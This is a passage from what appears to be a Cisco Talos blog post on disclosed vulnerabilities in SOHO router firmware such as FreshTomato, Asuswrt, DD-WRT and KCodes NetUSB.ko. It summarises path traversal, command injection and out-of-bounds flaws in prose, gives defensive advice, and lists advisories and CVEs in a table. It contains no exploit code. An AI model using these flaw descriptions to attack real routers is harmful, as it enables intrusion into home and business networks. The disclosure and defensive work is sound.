Routing, etc.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1642**: This vulnerability existed in one of the functionalities provided by FreshTomato&#x27;s HTTP server. It provides a simple template language, one of the templating functions to read the content of a file, provided by the user in a specific folder. Because no sanitization is performed and the file path is composed by concatenating the hard-coded path with the provided filename, this function is vulnerable to path traversal. An attacker with valid credentials could read any file in the file system.\n * **TALOS-2022-1641**: This vulnerability existed in one of the log-related functions provided by FreshTomato&#x27;s HTTP server. The functionality allows users to find certain strings in the log file via OS commands. Because no real sanitization is performed against the user-controlled parameter, this function is vulnerable to an OS command injection vulnerability. An attacker could leverage this vulnerability to achieve arbitrary command injection.\n * **TALOS-2022-1509**: This vulnerability existed in the URL unescape functionality provided by FreshTomato&#x27;s HTTP server. The unescape always assumes that there are two characters following the &#x27;%&#x27; character. However, this is not the case and opens the door to an out-of-bounds read-and-write.\n\n### Observations\n\nBecause the FreshTomato project is the base for many routers, any vulnerability found in the software could have wide-ranging consequences. We cannot fully gauge how the firmware is deployed and how much impact these vulnerabilities will have on the deployed router.\n\n## **Asuswrt and Asuswrt-Merlin New Gen, DD-WRT**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nLike FreshTomato, Asuswrt and Asuswrt-Merlin, New Gen and DD-WRT are the base firmware for several SOHO routers.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1511**: This vulnerability existed in the URL unescape functionality provided by the Asuswrt and Asuswrt-Merlin New Gen vulnerability&#x27;s HTTP server. The unescape always assumes that there are two characters following the &quot;%&quot; character. However, this is not the case and could lead to an out-of-bounds read and write.\n * **TALOS-2022-1510**: This vulnerability is in the URL unescape functionality provided by the DD-WRT&#x27;s HTTP server. The unescape always assumes that there are two characters following the &quot;%&quot; character, however, this assumption is incorrect and could lead to an out-of-bounds read and write.\n\n### Observations\n\nAfter our researchers discovered TALOS-2022-1509, we discovered [other software that was vulnerable to the same unescape vulnerable pattern](<https://blog.talosintelligence.com/vulnerability-spotlight-how-code-re-use/>), including TALOS-2022-1511 in Asuswrt and Asuswrt-Merlin New Gen, and TALOS-2022-1510 in DD-WRT.\n\n## **KCodes NetUSB.ko**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nSome NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer. The software used for NETGEAR routers is called NETGEAR USB Control Center, and it utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications.\n\n### Notable Vulnerabilities\n\n * **TALOS-2019-0775**: Once the static AES key was recovered, an attacker could easily trigger a DoS or remote information disclosure using a single opcode after the handshake. \n * **TALOS-2019-0776**: Similar to TALOS-2019-0775, this vulnerability leaks memory. In this case, it leaks very useful memory such as stack boundary addresses, a pointer to a specific configuration function and notably or the base address of the running kernel module NetUSB.ko. This could potentially be combined with other remote attacks that could leverage this data when designing a specific payload for the target.\n\n### Observations\n\nMany other products use NetUSB.ko. A previously disclosed vulnerability in 2015 led researchers to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69) since both modules are compiled for the same kernel. Specifically, the information disclosed in TALOS-2019-0776 appears to be particularly useful for recovering sensitive memory addresses for payload generation, regardless of the architecture/operating system that uses the kernel module.\n\n# Key observations\n\nSOHO routers are generally valuable targets for adversaries due to their position within the network and wide adoption within common network deployments. Their relatively low cost, wide availability, ease of acquisition and user-friendly management features leads to these products being in many homes, small and home offices, warehouses, coffee shops and many other businesses. They are even deployed as gateways providing remote access to industrial environments. \n\nVulnerabilities in these routers can provide entry to a huge variety of targets, and the same vulnerability can be used for impact, meaning these routers are high-value targets for malicious actors.\n\nThe security posture of these lower-cost routers has improved over the last few years, but in general, security advice for these devices is the same as it has been in the past. Some of the important security tenants for manufacturers are:\n\n * Features and services should be disabled by default unless they are critical for the operation of the device.\n * WAN-side management should be deactivated by default.\n * Support modern security features such as TLS/SSL encryption and make sure they&#x27;re implemented properly.\n * Never trust user input.\n * Keep third-party code up-to-date.\n * Audit or familiarize yourself with integrated code.\n * Don&#x27;t rely on obscure and undocumented diagnostic features or credentials.\n\nEach of the vulnerabilities discovered fall into one of these categories. Code quality is always going to be an additional concern, and the utilization of safe functions should always be enforced during development. Ideally, use static analysis tooling during development. This may not be financially viable for many products hoping to keep consumer costs low. In this case, lean on compiler warnings and any other methods of ensuring the highest code quality possible.\n\nSimple changes to the development process can mitigate many of the worst effects of these issues. Memory corruption, one of the most glaring vulnerabilities, can be mitigated by using memory-safe languages (i.e., Rust and Go). If safe languages are not an option, vendors should make sure to implement as many mitigations as possible, both compiler-based and OS-based. Examples of these mitigations would be non-executable stacks and address space layout randomization (ASLR).\n\nThe next most helpful change involves defining user interaction boundaries. Generic strings are notoriously difficult to parse or apply access controls to. By utilizing a well-defined API boundary, it is easier to validate user requests and input. The boundary also acts as an access control list to prevent a malicious user from executing arbitrary commands or providing input that would result in other unexpected behavior.\n\nThe most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device, and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable. Start your assessment by reading the router user manually thoroughly, even before purchase. The quality of details concerning device features in a user manual is often indicative of the overall product quality.\n\nWhile the security posture of SOHO routers has generally improved, many could benefit from low-cost mitigations that would drastically improve their security posture. Over the past few years, Talos has published 141 advisories covering 289 CVEs within 13 SOHO and industrial routers and six common frameworks. Talos vulnerability research is always driven by the mandate to protect Cisco customers, but we also aim to improve the security of all devices we research. All research has been publicly disclosed, after disclosure to the vendor, according to Cisco&#x27;s vulnerability disclosure policy. These disclosures directly result in vulnerability remediations that improve the security posture of anyone using these devices.\n\n# Vulnerability List\n\nThis blog post included a summary of each router and a few select vulnerabilities. Below is a list of all the advisories Talos disclosed post-VPNFilter.\n\n**Talos ID (Linked to Report)**\n\n| \n\n**CVE(s)**\n\n| \n\n**Product** \n \n---|---|--- \n \n[TALOS-2022-1511](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1511>)\n\n| \n\nCVE-2022-26376\n\n| \n\nAsuswrt and Asuswrt-Merlin New Gen \n \n[TALOS-2022-1592](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1592>)\n\n| \n\nCVE-2022-38393\n\n| \n\nAsus RT-AX82U \n \n[TALOS-2022-1590](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1590>)\n\n| \n\nCVE-2022-38105\n\n| \n\nAsus RT-AX82U \n \n[TALOS-2022-1586](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1586>)\n\n| \n\nCVE-2022-35401\n\n| \n\nAsus RT-AX82U \n \n[TALOS-2021-1361](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1361>)\n\n| \n\nCVE-2021-21913\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1285](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1285>)\n\n| \n\nCVE-2021-21820\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1284](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1284>)\n\n| \n\nCVE-2021-21819\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1283](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1283>)\n\n| \n\nCVE-2021-21818\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1282](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1282>)\n\n| \n\nCVE-2021-21817\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1281](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1281>)\n\n| \n\nCVE-2021-21816\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2022-1510](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1510>)\n\n| \n\nCVE-2022-27631\n\n| \n\nDD-WRT \n \n[TALOS-2022-1642](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1642>)\n\n| \n\nCVE-2022-38451\n\n| \n\nFreshTomato \n \n[TALOS-2022-1641](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1641>)\n\n| \n\nCVE-2022-42484\n\n| \n\nFreshTomato \n \n[TALOS-2022-1509](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1509>)\n\n| \n\nCVE-2022-28664 - CVE-2022-28665\n\n| \n\nFreshTomato \n \n[TALOS-2022-1523](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1523>)\n\n| \n\nCVE-2022-25932\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1522](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1522>)\n\n| \n\nCVE-2022-29888\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1521](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1521>)\n\n| \n\nCVE-2022-28689\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1520](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1520>)\n\n| \n\nCVE-2022-26023\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1519](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1519>)\n\n| \n\nCVE-2022-30543\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1518](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1518>)\n\n| \n\nCVE-2022-29481\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1501](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1501>)\n\n| \n\nCVE-2022-26518\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1500](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1500>)\n\n| \n\nCVE-2022-26075\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1499](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1499>)\n\n| \n\nCVE-2022-26420\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1496](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1496>)\n\n| \n\nCVE-2022-27172\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1495](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1495>)\n\n| \n\nCVE-2022-26510\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1481](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1481>)\n\n| \n\nCVE-2022-26780 - CVE-2022-26782\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1478](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1478>)\n\n| \n\nCVE-2022-26042\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1477](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1477>)\n\n| \n\nCVE-2022-25995\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1476](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1476>)\n\n| \n\nCVE-2022-26002\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1475](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1475>)\n\n| \n\nCVE-2022-26007\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1474](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1474>)\n\n| \n\nCVE-2022-26020\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1473](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1473>)\n\n| \n\nCVE-2022-26085\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1472](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1472>)\n\n| \n\nCVE-2022-21182\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1471](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1471>)\n\n| \n\nCVE-2022-24910\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1470](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1470>)\n\n| \n\nCVE-2022-25172\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1469](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1469>)\n\n| \n\nCVE-2022-21238\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1468](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1468>)\n\n| \n\nCVE-2022-21809\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2019-0776](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0776>)\n\n| \n\nCVE-2019-5017\n\n| \n\nKCodes NetUSB.ko \n \n[TALOS-2019-0775](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0775>)\n\n| \n\nCVE-2019-5016\n\n| \n\nKCodes NetUSB.ko \n \n[TALOS-2018-0625](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0625>)\n\n| \n\nCVE-2018-3953 - CVE-2018-3955\n\n| \n\nLinksys E Series \n \n[TALOS-2023-1723](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1723>)\n\n| \n\nCVE-2023-25582 - CVE-2023-25583\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1718](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1718>)\n\n| \n\nCVE-2023-24019\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1716](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1716>)\n\n| \n\nCVE-2023-25081 - CVE-2023-25124\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1715](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1715>)\n\n| \n\nCVE-2023-24018\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1714](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1714>)\n\n| \n\nCVE-2023-22653\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1713](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1713>)\n\n| \n\nCVE-2023-24595\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1712](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712>)\n\n| \n\nCVE-2023-22299\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1711](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1711>)\n\n| \n\nCVE-2023-22365\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1710](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1710>)\n\n| \n\nCVE-2023-24582 - CVE-2023-24583\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1706](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1706>)\n\n| \n\nCVE-2023-24519 - CVE-2023-24520\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1705](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1705>)\n\n| \n\nCVE-2023-23546\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1699](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1699>)\n\n| \n\nCVE-2023-22659\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1698](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1698>)\n\n| \n\nCVE-2023-22306\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>)\n\n| \n\nCVE-2023-23902\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1696](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1696>)\n\n| \n\nCVE-2023-23571\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1695](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1695>)\n\n| \n\nCVE-2023-23547\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1694](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1694>)\n\n| \n\nCVE-2023-23550\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1704](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1704>)\n\n| \n\nCVE-2023-24496 - CVE-2023-24497\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1703](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1703>)\n\n| \n\nCVE-2023-22371\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1702](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1702>)\n\n| \n\nCVE-2023-23907\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>)\n\n| \n\nCVE-2023-22319\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1700](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1700>)\n\n| \n\nCVE-2023-22844\n\n| \n\nMilesightVPN \n \n[TALOS-2022-1598](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1598>)\n\n| \n\nCVE-2022-38458\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2022-1597](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1597>)\n\n| \n\nCVE-2022-36429\n\n| \n\nNetgear Orbi Satellite RBS750 \n \n[TALOS-2022-1596](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1596>)\n\n| \n\nCVE-2022-37337\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2022-1595](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1595>)\n\n| \n\nCVE-2022-38452\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2019-0893](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0893>)\n\n| \n\n\u200b\u200bCVE-2019-5101 - CVE-2019-5102\n\n| \n\nOpenWrt \n \n[TALOS-2022-1580](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1580>)\n\n| \n\nCVE-2022-34845\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1579](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1579>)\n\n| \n\nCVE-2022-33897\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1578](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1578>)\n\n| \n\nCVE-2022-34850\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1577](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1577>)\n\n| \n\nCVE-2022-33150\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1576](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1576>)\n\n| \n\nCVE-2022-32765\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1575](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1575>)\n\n| \n\nCVE-2022-35261-CVE-2022-35271\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1573](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1573>)\n\n| \n\nCVE-2022-33325-CVE-2022-33329\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1572](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1572>)\n\n| \n\nCVE-2022-33312-CVE-2022-33314\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1571](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1571>)\n\n| \n\nCVE-2022-28127\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1570](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1570>)\n\n| \n\nCVE-2022-32585\n\n| \n\nRobustel R1510 \n \n[TALOS-2018-0756](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0756>)\n\n| \n\nCVE-2018-4072 - CVE-2018-4073\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0755](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0755>)\n\n| \n\nCVE-2018-4070 - CVE-2018-4071\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0754](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0754>)\n\n| \n\nCVE-2018-4069\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0753](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0753>)\n\n| \n\nCVE-2018-4068\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0752](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0752>)\n\n| \n\nCVE-2018-4067\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0751](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0751>)\n\n| \n\nCVE-2018-4066\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0750](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0750>)\n\n| \n\nCVE-2018-4065\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0749](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0749>)\n\n| \n\nCVE-2018-4064\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0748](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0748>)\n\n| \n\nCVE-2018-4063\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0747](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0747>)\n\n| \n\nCVE-2018-4062\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0746](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0746>)\n\n| \n\nCVE-2018-4061\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>)\n\n| \n\nCVE-2022-42490-CVE-2022-42493\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>)\n\n| \n\nCVE-2022-41991\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>)\n\n| \n\nCVE-2022-40222\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>)\n\n| \n\nCVE-2022-41154\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>)\n\n| \n\nCVE-2022-38066\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>)\n\n| \n\nCVE-2022-40985-CVE-2022-41030\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>)\n\n| \n\nCVE-2022-40220\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>)\n\n| \n\nCVE-2022-39045\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>)\n\n| \n\nCVE-2022-38715\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>)\n\n| \n\nCVE-2022-38088\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>)\n\n| \n\nCVE-2022-38459\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>)\n\n| \n\nCVE-2022-40969\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>)\n\n| \n\nCVE-2022-40701\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>)\n\n| \n\nCVE-2022-36279\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2020-1064](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1064>)\n\n| \n\nNone (Cloud)\n\n| \n\nSynology QuickConnect \n \n[TALOS-2020-1060](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1060>)\n\n| \n\nNone (Cloud)\n\n| \n\nSynology QuickConnect \n \n[TALOS-2020-1087](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1087>)\n\n| \n\nCVE-2020-27659-CVE-2020-27660\n\n| \n\nSynology SRM \n \n[TALOS-2020-1086](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1086>)\n\n| \n\nCVE-2020-27658\n\n| \n\nSynology SRM \n \n[TALOS-2020-1071](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1071>)\n\n| \n\nCVE-2020-27656-CVE-2020-27657\n\n| \n\nSynology SRM \n \n[TALOS-2020-1066](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1066>)\n\n| \n\nCVE-2020-27655\n\n| \n\nSynology SRM \n \n[TALOS-2020-1065](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1065>)\n\n| \n\nCVE-2020-27654, CVE-2020-11117\n\n| \n\nSynology SRM \n \n[TALOS-2020-1061](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1061>)\n\n| \n\nCVE-2020-27652-CVE-2020-27653\n\n| \n\nSynology SRM \n \n[TALOS-2020-1059](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1059>)\n\n| \n\nCVE-2020-27650-CVE-2020-27651\n\n| \n\nSynology SRM \n \n[TALOS-2020-1058](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1058>)\n\n| \n\nCVE-2020-27648-CVE-2020-27649\n\n| \n\nSynology SRM \n \n[TALOS-2020-1051](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1051>)\n\n| \n\nCVE-2019-11823\n\n| \n\nSynology SRM \n \n[TALOS-2022-1507](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1507>)\n\n| \n\nCVE-2022-26346\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1506](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1506>)\n\n| \n\nCVE-2022-27178\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1505](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1505>)\n\n| \n\nCVE-2022-27185\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1504](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1504>)\n\n| \n\nCVE-2022-27630\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1503](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1503>)\n\n| \n\nCVE-2022-27633\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1502](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1502>)\n\n| \n\nCVE-2022-27660\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1484](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1484>)\n\n| \n\nCVE-2022-26342\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1483](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1483>)\n\n| \n\nCVE-2022-26009\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1482](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1482>)\n\n| \n\nCVE-2022-25996\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1463](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1463>)\n\n| \n\nCVE-2022-24005 - CVE-2022-24029\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1462](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1462>)\n\n| \n\nCVE-2022-23103\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1459](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1459>)\n\n| \n\nCVE-2022-22144\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1458](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1458>)\n\n| \n\nCVE-2022-22140\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1457](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1457>)\n\n| \n\nCVE-2022-21178\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1456](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1456>)\n\n| \n\nCVE-2022-21201\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1455](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1455>)\n\n| \n\nCVE-2022-23918 - CVE-2022-23919\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1454](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1454>)\n\n| \n\nCVE-2022-23399\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2018-0620](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620>)\n\n| 